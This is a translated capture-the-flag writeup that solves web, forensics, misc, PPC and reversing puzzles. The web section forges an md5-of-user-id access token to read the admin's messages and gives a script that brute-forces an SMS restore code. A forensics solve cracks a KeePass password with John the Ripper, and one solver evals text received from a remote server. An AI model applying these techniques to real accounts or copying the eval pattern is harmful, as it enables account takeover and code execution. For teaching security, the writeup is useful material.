This is a writeup for my first CTF of 2020.
This time I took part as team KogCoder and finished in 53rd place.
A guy who is two months late (and counting) on his Advent calendar post also helped out this time, so it has been a really long time since I played a CTF as anything other than a one-person team.
Oh, the joy of a team with more than one person.
Now, on to explanations of the challenges we solved.
Web
Door paradox
- Logging in with the provided account `test` adds a 32-digit access_key to Local Storage
- Its contents stayed constant at `eccbc87e4b5ce2fe28308fd9f2a7baf3` even after logging in and out as `test` several times, so I guessed it was some kind of constant
- Throwing it at CrackStation revealed that it is the md5 hash of `3`
- This value `3` looks like the id of the `test` account, so I set access_key to `c4ca4238a0b923820dcc509a6f75849b`, the md5 hash of `1`, which is Admin1's id, and the conversations visible under messages changed
- Searching for FLAG, the very last match (presumably the one the challenge author had prepared from the start) was the flag
- FLAG{iD00r_with_insecure_token}
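Why the token above is guessable, and what a fix looks like, as an added example (not code from the challenge or from the original post). The function names and the in-memory session store are assumptions made for illustration: `weak_access_key` reproduces the scheme observed above, `looks_like_hashed_id` is a check a reviewer can run on tokens their own application issues, and `issue_session` is the hardened form.

```python
import hashlib
import secrets


def weak_access_key(user_id: int) -> str:
    """Token scheme observed in the challenge: md5 of the numeric user id."""
    return hashlib.md5(str(user_id).encode()).hexdigest()


def looks_like_hashed_id(token: str, max_id: int = 100_000):
    """Audit check: return the id if token == md5(str(id)) for a small id, else None."""
    token = token.lower()
    for candidate in range(max_id + 1):
        if weak_access_key(candidate) == token:
            return candidate
    return None


# Hardened form: the token is random and carries no information about the
# user; only the server can map it back to an account.
_sessions = {}  # hypothetical in-memory store: token -> user id


def issue_session(user_id: int) -> str:
    token = secrets.token_urlsafe(32)  # 32 random bytes from the OS CSPRNG
    _sessions[token] = user_id
    return token


def user_for(token: str):
    """Server-side lookup; a token the server never issued maps to no user."""
    return _sessions.get(token)


if __name__ == "__main__":
    print(weak_access_key(3))                                       # value seen for `test`
    print(looks_like_hashed_id("c4ca4238a0b923820dcc509a6f75849b"))  # recovers the id
    t = issue_session(3)
    print(looks_like_hashed_id(t, max_id=1000), user_for(t))
```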
Admin
- Brute force, the manly way
- bruteforce.py

```python
#!/usr/bin/env python3
import requests

# The first request, sent without parameters, returns the initial hash
pre = requests.post("http://sherlock-message.ru/api/admin.restore")
print(pre.json())
h = pre.json()["response"]["new_hash"]

for i in range(260000, 280000):
    packet = {
        'hash': h,
        'sms_code': i
    }
    r = requests.post("http://sherlock-message.ru/api/admin.restore", data=packet)
    print(r.content)
    try:
        # Carry the new_hash from this response into the next attempt
        h = r.json()["response"]["new_hash"]
    except:
        # No new_hash in the response: print the message and stop
        print(r.json()["response"]["message"])
        exit()
```
- FLAG{bruTe_with_hash_f0rce}
Forensics
Doc. Holmes
- A file called some.file is given
- According to UsaMimi Hurricane (うさみみハリケーン), it is apparently a docx file
- I had heard somewhere that a docx is nothing more than XML stuffed into a zip file, so I ran unzip on it
- Opening word/media/image2.jpg from inside, there was the flag
- FLAG{ProMinentplace}
Blogger
- I took the script from http://basketball-hacker.hatenablog.jp/entry/2017/08/30/000000, made it run on Python 3, adjusted the file name and so on for this challenge, and it worked
- sol.py

```python
#!/usr/bin/env python3
from scapy.all import *

# USB HID keyboard usage ID -> (unshifted, shifted) character
keymap = {
    0x04: ('a','A'), 0x05: ('b','B'), 0x06: ('c','C'), 0x07: ('d','D'),
    0x08: ('e','E'), 0x09: ('f','F'), 0x0a: ('g','G'), 0x0b: ('h','H'),
    0x0c: ('i','I'), 0x0d: ('j','J'), 0x0e: ('k','K'), 0x0f: ('l','L'),
    0x10: ('m','M'), 0x11: ('n','N'), 0x12: ('o','O'), 0x13: ('p','P'),
    0x14: ('q','Q'), 0x15: ('r','R'), 0x16: ('s','S'), 0x17: ('t','T'),
    0x18: ('u','U'), 0x19: ('v','V'), 0x1a: ('w','W'), 0x1b: ('x','X'),
    0x1c: ('y','Y'), 0x1d: ('z','Z'), 0x1e: ('1','!'), 0x1f: ('2','@'),
    0x20: ('3','#'), 0x21: ('4','$'), 0x22: ('5','%'), 0x23: ('6','^'),
    0x24: ('7','&'), 0x25: ('8','*'), 0x26: ('9','('), 0x27: ('0',')'),
    0x28: (' [Enter] ',' [Enter] '), 0x29: ('\x1b','\x1b'),
    0x2a: (' [del] ',' [del] '), 0x2b: ('\x09','\x09'), 0x2c: ('\x20','\x20'),
    0x2d: ('-','_'), 0x2e: ('=','+'), 0x2f: ('[','{'), 0x30: (']','}'),
    0x31: ('\\','|'), 0x33: (';',':'), 0x34: ('\'','\"'), 0x35: ('`','~'),
    0x36: (',','<'), 0x37: ('.','>'), 0x38: ('/','?'),
    0x51: (' [downArrow] ',' [downArrow] '),
    0x52: (' [upArrow] ',' [upArrow] '), 0x32: ('\\','|')
}

def read_usbdata_from_pcap():
    pcap = rdpcap("usb_here.pcap")
    usb_data = []
    for pkt in pcap:
        buf = pkt['Raw'].load
        #if buf[22] == '\x01':
        # Keep only packets whose payload after byte 27 is an 8-byte HID report
        if len(buf[27:]) == 8:
            usb_data.append(buf[27:])
    return usb_data

def analyze_usb_data(usb_data):
    flag = ""
    for d in usb_data:
        if d[2] == ord('\x00') or not(ord('\00') in d[3:8]):
            # No Event
            continue
        if d[0] == ord('\x02') or d[0] == ord('\x20'):
            # press shift
            # binary -> int
            c = keymap[d[2]][1]
            flag += c
        else:
            # binary -> int
            c = keymap[d[2]][0]
            flag += c
    print(flag)

def main():
    data = read_usbdata_from_pcap()
    analyze_usb_data(data)

if __name__ == '__main__':
    main()
```
- FLAG{like_a_b100dh0und}
Confidential
- Examining the provided packet capture, in addition to various images and videos there was a file called `database.kbdx`
- Apparently a kbdx file is a database file for the password manager KeePass
- When I tried to open it, it asked for a password
- I had no idea what that might be, so I threw it at JohnTheRipper, which told me "the password is blowme!"
- Opening the database again with that password turned up 10 password entries; going through them one by one, the flag was in Andrea Leadsom's password
- FLAG{bru73_p455w0rd_4ll_n16h7_l0n6}
Misc
Deep dive
- A file called flag.txt is given
- It appears to be a tar archive, and extracting it yields a zip file this time
- At this point I realized "oh, this is definitely one of those you have to repeat hundreds of times", so I threw together a script
- The flag was written in the flag.txt that came out of the 723rd extraction
- sol.py

```python
#!/usr/bin/env python3
import subprocess

n = 0
while True:
    # Extract the archive in directory n into directory n + 1
    p = subprocess.run(("unar -D -o %d %d/flag.txt" % (n + 1, n)).split())
    if p.returncode == 1:
        # Fall back to the name "flag" when flag.txt could not be extracted
        p = subprocess.run(("unar -D -o %d %d/flag" % (n + 1, n)).split())
        if p.returncode == 1:
            exit()
    n += 1
```
- FLAG{matri0sha256}
Layouts
- A zip file encrypted with a password identical to its own file name is given
- Extracting it yields yet another zip file encrypted with a password identical to its file name
- At this point I caught the same smell as Deep dive, so I wrote an extraction script
- extract.py

```python
#!/usr/bin/env python3
import zipfile

fname = "RWtm7A5f"
while True:
    with zipfile.ZipFile(fname) as zf:
        # Each archive's password is its own file name
        zf.extractall(pwd=fname.encode('utf-8'))
        fname = zf.infolist()[0].filename
```

- Running the script until it dies with an exception leaves a file called flag
- Examining this file, it appears to be an xz-compressed tar file, so I extracted it with `tar xf flag`
- That produces a folder called flags
- Inside were folders named 1 through 255, and some of them contained an empty file

```
./flags/101/9   ./flags/112/18  ./flags/123/5   ./flags/51/10  ./flags/78/3  ./flags/95/15
./flags/102/11  ./flags/117/12  ./flags/125/21  ./flags/52/14  ./flags/83/1
./flags/103/8   ./flags/120/13  ./flags/49/19   ./flags/52/7   ./flags/84/4
./flags/110/16  ./flags/122/6   ./flags/49/20   ./flags/53/17  ./flags/89/2
```

- Listing the places that held a file, the names of the folders containing files all look like printable ASCII code points
- Also, the file names cover every number from 1 to 21 with no duplicates
- As a test, I took `chr(folder name)` for each and arranged the characters in file name order, which gave `SYNT{z4ge3fux4_n5p11}`
- Running this through ROT13 gave the flag
- FLAG{m4tr3shk4_a5c11}
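The last two steps (folder name to character, file name to position, then ROT13) as an added example that is not part of the original post. The listing is copied from the writeup above; `decode_listing` and `rot13` are names chosen here, and the checks encode the two observations the writeup makes (printable folder values, positions 1..n without duplicates).

```python
import codecs
import re

# Listing copied from the writeup above: ./flags/<folder>/<file>
LISTING = """
./flags/101/9 ./flags/112/18 ./flags/123/5 ./flags/51/10 ./flags/78/3 ./flags/95/15
./flags/102/11 ./flags/117/12 ./flags/125/21 ./flags/52/14 ./flags/83/1
./flags/103/8 ./flags/120/13 ./flags/49/19 ./flags/52/7 ./flags/84/4
./flags/110/16 ./flags/122/6 ./flags/49/20 ./flags/53/17 ./flags/89/2
"""


def decode_listing(listing: str) -> str:
    """Put chr(<folder>) at position <file> and return the assembled string."""
    by_position = {}
    for folder, position in re.findall(r"\./flags/(\d+)/(\d+)", listing):
        folder, position = int(folder), int(position)
        if not 0x20 <= folder <= 0x7E:
            raise ValueError(f"folder {folder} is not printable ASCII")
        if position in by_position:
            raise ValueError(f"position {position} appears twice")
        by_position[position] = chr(folder)
    # The positions must be exactly 1..n, otherwise a character is missing
    expected = set(range(1, len(by_position) + 1))
    if set(by_position) != expected:
        missing = sorted(expected - set(by_position))
        raise ValueError(f"missing positions: {missing}")
    return "".join(by_position[i] for i in sorted(by_position))


def rot13(text: str) -> str:
    """ROT13 shifts letters only; digits, braces and underscores pass through."""
    return codecs.decode(text, "rot_13")


if __name__ == "__main__":
    encoded = decode_listing(LISTING)
    print(encoded)
    print(rot13(encoded))
```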
True Detective
- A deduction puzzle built with Google Forms
- Pressing F12 and searching for `FLAG` hits the text "1 - FLAG{08"
- Looking around that spot also turns up
"2 - c49c3d9a"
"3 - e8898343"
"4 - 7729747b"
"5 - cf1be8}"
so joining them in numeric order gives the flag
- FLAG{08c49c3d9ae88983437729747bcf1be8}
PPC
Magic of numbers
- Arithmetic problems are sent to you, so all you have to do is eval them and send the result back
- sol.py

```python
#!/usr/bin/env python
from pwn import *
import base64

target = ('nc 212.47.229.1 33004'.split(' '))
io = process(target)
# Skip the three banner lines
io.readline()
io.readline()
io.readline()
while True:
    out = io.readline()
    try:
        # Drop the 4-byte prefix and evaluate the rest as an expression
        d = eval(out[4:])
    except:
        print(out)
        exit()
    print("out:%s\ndec:%s" % (out, str(d)))
    payload = str(d)
    io.sendline(payload)
    io.read(12)
```
- FLAG{MaGiC_0f_NuMbErS}
Reverse
Crossw0rd
- The flag is checked in six separate functions: `a()`, `b()`, `c()`, `d()`, `e()` and `f()`.
- The comparison logic itself just takes one character at a time and compares it, so I simply joined the pieces together and was done
- FLAG{3a5yr3v3r5ing}